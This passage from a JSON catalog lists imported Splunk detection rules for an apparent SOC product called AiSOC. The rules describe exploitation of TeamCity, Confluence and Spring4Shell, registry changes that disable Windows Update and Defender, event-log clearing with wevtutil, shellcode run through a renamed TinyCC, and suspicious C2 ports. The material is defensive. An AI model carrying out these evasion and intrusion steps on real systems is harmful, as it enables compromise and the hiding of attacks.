If confirmed malicious, this could result in severe security breaches and compromise the integrity of the development environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-authentication-bypass-suricata-cve-2024-27198.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbcc04c7-8a79-453c-b3a9-c232c423bdd3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_authentication_bypass_suricata_cve_2024_27198.yml" } }, { "id": "splunk-security-content-fbcc04c7-8a79-453c-b3a9-c232c423bdd4", "type": "detection", "name": "JetBrains TeamCity Authentication Bypass CVE-2024-27198", "description": "The following analytic identifies attempts to exploit the JetBrains TeamCity Authentication Bypass vulnerability (CVE-2024-27198). It detects suspicious POST requests to the `/app/rest/users` and `/app/rest/users/id:1/tokens` endpoints, which are indicative of attempts to create new administrator users or generate admin access tokens without authentication. This detection leverages the Web datamodel and CIM-compliant log sources, such as Nginx or TeamCity logs. This activity is significant as it can lead to full control over the TeamCity server, including all projects, builds, agents, and artifacts. 
If confirmed malicious, attackers could gain unauthorized administrative access, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-authentication-bypass-cve-2024-27198.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbcc04c7-8a79-453c-b3a9-c232c423bdd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_authentication_bypass_cve_2024_27198.yml" } }, { "id": "splunk-security-content-fbd4f333-17bb-4eab-89cb-860fa2e0600e", "type": "detection", "name": "Windows Modify Registry No Auto Update", "description": "The following analytic identifies a suspicious modification to the Windows registry that disables automatic updates. It detects changes to the registry path `SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoUpdate` with a value of `0x00000001`. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to evade detection and maintain persistence. 
If confirmed malicious, this could allow attackers to bypass security updates, leaving the system vulnerable to further exploitation and potential zero-day attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-no-auto-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbd4f333-17bb-4eab-89cb-860fa2e0600e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_no_auto_update.yml" } }, { "id": "splunk-security-content-fbf9e47f-e531-4fea-942d-5c95af7ed4d6", "type": "detection", "name": "Windows PowerView Unconstrained Delegation Discovery", "description": "The following analytic detects the use of PowerView commandlets to discover Windows endpoints with Kerberos Unconstrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific commands like `Get-DomainComputer` or `Get-NetComputer` with the `-Unconstrained` parameter. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to map out privileged delegation settings in Active Directory. 
If confirmed malicious, this could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-unconstrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbf9e47f-e531-4fea-942d-5c95af7ed4d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_unconstrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-fbfef407-cfee-4866-88c1-f8de1c16147c", "type": "detection", "name": "Windows Impair Defense Disable PUA Protection", "description": "The following analytic detects a modification in the Windows registry to disable Windows Defender PUA protection by setting PUAProtection to 0. This detection leverages data from the Endpoint.Registry datamodel, focusing on registry path changes related to Windows Defender. Disabling PUA protection is significant as it reduces defenses against Potentially Unwanted Applications (PUAs), which, while not always malicious, can negatively impact user experience and security. 
If confirmed malicious, this activity could allow an attacker to introduce adware, browser toolbars, or other unwanted software, potentially compromising system integrity and user productivity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-pua-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbfef407-cfee-4866-88c1-f8de1c16147c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_pua_protection.yml" } }, { "id": "splunk-security-content-fc2a024a-18c1-4d31-9480-7f04cf3ff293", "type": "detection", "name": "MCP Filesystem Server Suspicious Extension Write", "description": "This detection identifies attempts to create executable or script files through MCP filesystem server connections. Threat actors leveraging LLM-based tools may attempt to write malicious executables, scripts, or batch files to disk for persistence or code execution. 
The detection prioritizes files written to system directories or startup locations, which indicate a higher likelihood of malicious intent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-filesystem-server-suspicious-extension-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc2a024a-18c1-4d31-9480-7f04cf3ff293", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_filesystem_server_suspicious_extension_write.yml" } }, { "id": "splunk-security-content-fc32a8d5-bc79-4437-b48f-4646ab7bed9d", "type": "detection", "name": "Cisco NVM - Outbound Connection to Suspicious Port", "description": "The following analytic detects any outbound network connection from an endpoint process to a known suspicious or non-standard port.\nIt leverages Cisco Network Visibility Module flow data logs to identify potentially suspicious behavior by looking at processes\ncommunicating over ports like 4444, 2222, or 51820, which are commonly used by tools such as Metasploit, SliverC2, or other pentest, red team, or malware tooling.\nThese connections are worth investigating further, especially when initiated by unexpected or non-network-native binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": 
false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-outbound-connection-to-suspicious-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc32a8d5-bc79-4437-b48f-4646ab7bed9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___outbound_connection_to_suspicious_port.yml" } }, { "id": "splunk-security-content-fc3ccef1-60a4-4239-bd66-b279511b4d14", "type": "detection", "name": "Windows AD Domain Controller Audit Policy Disabled", "description": "The following analytic detects the disabling of audit policies on a domain controller. It leverages EventCode 4719 from Windows Security Event Logs to identify changes where success or failure auditing is removed. This activity is significant as it suggests an attacker may have gained access to the domain controller and is attempting to evade detection by tampering with audit policies. If confirmed malicious, this could lead to severe consequences, including data theft, privilege escalation, and full network compromise. 
Immediate investigation is required to determine the source and intent of the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-controller-audit-policy-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc3ccef1-60a4-4239-bd66-b279511b4d14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_controller_audit_policy_disabled.yml" } }, { "id": "splunk-security-content-fc5531ae-62fd-4de6-9c36-b4afdae8ca95", "type": "detection", "name": "Kubernetes Nginx Ingress RFI", "description": "The following analytic detects remote file inclusion (RFI) attacks targeting Kubernetes Nginx ingress controllers. It leverages Kubernetes logs from the Nginx ingress controller, parsing fields such as `remote_addr`, `request`, and `url` to identify suspicious activity. This activity is significant because RFI attacks can allow attackers to execute arbitrary code or access sensitive files on the server. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-nginx-ingress-rfi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc5531ae-62fd-4de6-9c36-b4afdae8ca95", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_nginx_ingress_rfi.yml" } }, { "id": "splunk-security-content-fca01769-5163-4b3a-ae44-de874adfc9bc", "type": "detection", "name": "Windows Phishing Outlook Drop Dll In FORM Dir", "description": "The following analytic detects the creation of a DLL file by an outlook.exe process in the AppData\\Local\\Microsoft\\FORMS directory. This detection leverages data from the Endpoint.Processes and Endpoint.Filesystem datamodels, focusing on process and file creation events. This activity is significant as it may indicate an attempt to exploit CVE-2024-21378, where a custom MAPI form loads a potentially malicious DLL. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-outlook-drop-dll-in-form-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fca01769-5163-4b3a-ae44-de874adfc9bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_outlook_drop_dll_in_form_dir.yml" } }, { "id": "splunk-security-content-fcd6dfeb-191c-46a0-a29c-c306382145ab", "type": "detection", "name": "Azure AD PIM Role Assigned", "description": "The following analytic detects the assignment of an Azure AD Privileged Identity Management (PIM) role. It leverages Azure Active Directory events to identify when a user is added as an eligible member to a PIM role. This activity is significant because PIM roles grant elevated privileges, and their assignment should be closely monitored to prevent unauthorized access. 
If confirmed malicious, an attacker could exploit this to gain privileged access, potentially leading to unauthorized actions, data breaches, or further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-pim-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcd6dfeb-191c-46a0-a29c-c306382145ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_pim_role_assigned.yml" } }, { "id": "splunk-security-content-fcd74532-ae54-11eb-a5ab-acde48001122", "type": "detection", "name": "Enumerate Users Local Group Using Telegram", "description": "The following analytic detects a Telegram process enumerating all network users in a local group. It leverages EventCode 4798, which is generated when a process enumerates a user's security-enabled local groups on a computer or device. This activity is significant as it may indicate an attempt to gather information on user accounts, a common precursor to further malicious actions. 
If confirmed malicious, this behavior could allow an attacker to map out user accounts, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enumerate-users-local-group-using-telegram.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcd74532-ae54-11eb-a5ab-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enumerate_users_local_group_using_telegram.yml" } }, { "id": "splunk-security-content-fcdfd69d-0ca3-4476-920e-9b633cb4593e", "type": "detection", "name": "Web Spring4Shell HTTP Request Class Module", "description": "The following analytic detects HTTP requests containing payloads related to the Spring4Shell vulnerability (CVE-2022-22965). It leverages Splunk Stream HTTP data to inspect the HTTP request body and form data for specific fields such as \"class.module.classLoader.resources.context.parent.pipeline.first\". This activity is significant as it indicates an attempt to exploit a critical vulnerability in Spring Framework, potentially leading to remote code execution. 
If confirmed malicious, this could allow attackers to gain unauthorized access, execute arbitrary code, and compromise the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-spring4shell-http-request-class-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcdfd69d-0ca3-4476-920e-9b633cb4593e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_spring4shell_http_request_class_module.yml" } }, { "id": "splunk-security-content-fcf4bd3f-a79f-4b7a-83bf-2692d60b859c", "type": "detection", "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", "description": "The following analytic detects attempts to exploit CVE-2022-26134, an unauthenticated remote code execution vulnerability in Confluence. It leverages the Web datamodel to analyze network and CIM-compliant web logs, identifying suspicious URL patterns and parameters indicative of exploitation attempts. This activity is significant as it allows attackers to execute arbitrary code on the Confluence server without authentication, potentially leading to full system compromise. If confirmed malicious, this could result in unauthorized access, data exfiltration, and further lateral movement within the network. 
Immediate investigation and remediation are crucial to prevent extensive damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-unauthenticated-remote-code-execution-cve-2022-26134.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcf4bd3f-a79f-4b7a-83bf-2692d60b859c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_unauthenticated_remote_code_execution_cve_2022_26134.yml" } }, { "id": "splunk-security-content-fcf4bd3f-a79f-4b7a-83bf-2692d60b859d", "type": "detection", "name": "Microsoft SharePoint Server Elevation of Privilege", "description": "The following analytic detects potential exploitation attempts against Microsoft SharePoint Server vulnerability CVE-2023-29357.\nIt leverages the Web datamodel to monitor for specific API calls and HTTP methods indicative of privilege escalation attempts.\nThis activity is significant as it may indicate an attacker is trying to gain unauthorized privileged access to the SharePoint environment.\nIf confirmed malicious, the impact could include unauthorized access to sensitive data, potential data theft, and further compromise of the SharePoint server, leading to a broader security breach.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-sharepoint-server-elevation-of-privilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcf4bd3f-a79f-4b7a-83bf-2692d60b859d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/microsoft_sharepoint_server_elevation_of_privilege.yml" } }, { "id": "splunk-security-content-fd22124e-dbac-4744-a8ce-be10d8ec3e26", "type": "detection", "name": "O365 Multiple Failed MFA Requests For User", "description": "The following analytic identifies potential \"MFA fatigue\" attacks targeting Office 365 users by detecting more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. It leverages O365 management activity logs, focusing on Azure Active Directory events with the UserLoginFailed operation, a Success ResultStatus, and an ErrorNumber of 500121. This activity is significant as attackers may exploit MFA fatigue to gain unauthorized access by overwhelming users with repeated MFA requests. If confirmed malicious, this could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. 
Immediate investigation is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fd22124e-dbac-4744-a8ce-be10d8ec3e26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-fd496996-7d9e-4894-8d40-bb85b6192dc6", "type": "detection", "name": "Windows LOLBAS Executed As Renamed File", "description": "The following analytic identifies a LOLBAS process being executed where its process name does not match its original file name attribute. Processes that have been renamed and executed may be an indicator that an adversary is attempting to evade defenses or execute malicious code. 
The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lolbas-executed-as-renamed-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fd496996-7d9e-4894-8d40-bb85b6192dc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lolbas_executed_as_renamed_file.yml" } }, { "id": "splunk-security-content-fdb0f805-74e4-4539-8c00-618927333aae", "type": "detection", "name": "Spike in File Writes", "description": "The following analytic detects a sharp increase in the number of files written to a specific host. It leverages the Endpoint.Filesystem data model, focusing on 'created' actions and comparing current file write counts against historical averages and standard deviations. This activity is significant as a sudden spike in file writes can indicate malicious activities such as ransomware encryption or data exfiltration. 
If confirmed malicious, this behavior could lead to significant data loss, system compromise, or further propagation of malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spike-in-file-writes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb0f805-74e4-4539-8c00-618927333aae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spike_in_file_writes.yml" } }, { "id": "splunk-security-content-fdb59aef-d88f-4909-8369-ec2afbd2c398", "type": "detection", "name": "Windows MSIExec DLLRegisterServer", "description": "The following analytic detects the execution of msiexec.exe with the /y switch parameter, which enables the loading of DLLRegisterServer. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and parent-child process relationships. This activity is significant because it can indicate an attempt to register malicious DLLs, potentially leading to code execution or persistence on the system. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb59aef-d88f-4909-8369-ec2afbd2c398", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_dllregisterserver.yml" } }, { "id": "splunk-security-content-fdb6774e-e465-4912-86e3-63cf9ab91491", "type": "detection", "name": "Windows TinyCC Shellcode Execution", "description": "Detects abuse of Tiny-C-Compiler (TinyCC) for shellcode execution, where tcc.exe is renamed to masquerade as svchost.exe and used to compile and execute C source files containing shellcode. This technique was observed in the Lotus Blossom Chrysalis backdoor campaign, where attackers renamed tcc.exe to svchost.exe and executed conf.c containing Metasploit block_api shellcode with the flags -nostdlib -run.\nTinyCC is a legitimate C compiler, but its ability to compile and execute code on-the-fly makes it attractive to attackers seeking to evade detection. 
The combination of a renamed compiler binary executing from non-standard locations with suspicious flags is a strong indicator of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1027", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-tinycc-shellcode-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb6774e-e465-4912-86e3-63cf9ab91491", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_tinycc_shellcode_execution.yml" } }, { "id": "splunk-security-content-fdb829a8-db84-4832-b64b-3e964cd44f01", "type": "detection", "name": "Windows Eventlog Cleared Via Wevtutil", "description": "The following analytic detects the usage of wevtutil.exe with the \"clear-log\" parameter in order to clear the contents of logs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because clearing event logs can be an attempt to cover tracks after malicious actions, hindering forensic investigations. 
If confirmed malicious, this behavior could allow an attacker to erase evidence of their activities, making it difficult to trace their actions and understand the full scope of the compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-eventlog-cleared-via-wevtutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb829a8-db84-4832-b64b-3e964cd44f01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_eventlog_cleared_via_wevtutil.yml" } }, { "id": "splunk-security-content-fddad083-cdf5-419d-83c6-baa85e329595", "type": "detection", "name": "O365 Mail Permissioned Application Consent Granted by User", "description": "The following analytic identifies instances where a user grants consent to an application requesting mail-related permissions within the Office 365 environment. It leverages O365 audit logs, specifically focusing on events related to application permissions and user consent actions. This activity is significant as it can indicate potential security risks, such as data exfiltration or spear phishing, if malicious applications gain access. If confirmed malicious, this could lead to unauthorized data access, email forwarding, or sending malicious emails from the compromised account. 
Validating the legitimacy of the application and consent context is crucial to prevent data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mail-permissioned-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fddad083-cdf5-419d-83c6-baa85e329595", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mail_permissioned_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-fddf3b56-7933-11ec-98a6-acde48001122", "type": "detection", "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic detects the execution of native .NET binaries from non-standard directories within the Windows operating system.\nIt leverages Endpoint Detection and Response (EDR) telemetry, comparing process names and original file names against a predefined lookup \"is_net_windows_file\".\nThis activity is significant because adversaries may move .NET binaries to unconventional paths to evade detection and execute malicious code.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.\nAlso this analytic leverages a sub-search to enhance performance. sub-searches have limitations on the amount of data they can return. 
Keep this in mind if the \"is_net_windows_file\" lookup grows large, as results beyond the sub-search limit will be silently dropped.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dotnet-binary-in-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fddf3b56-7933-11ec-98a6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml" } }, { "id": "splunk-security-content-fe52c280-98bd-4596-b6f6-a13bbf8ac7c6", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Compute File Hashes", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender's file hash computation by setting the EnableFileHashComputation value to 0. This detection leverages data from the Endpoint.Registry data model, focusing on changes to the specific registry path associated with Windows Defender. Disabling file hash computation can significantly impair Windows Defender's ability to detect and scan for malware, making it a critical behavior to monitor. 
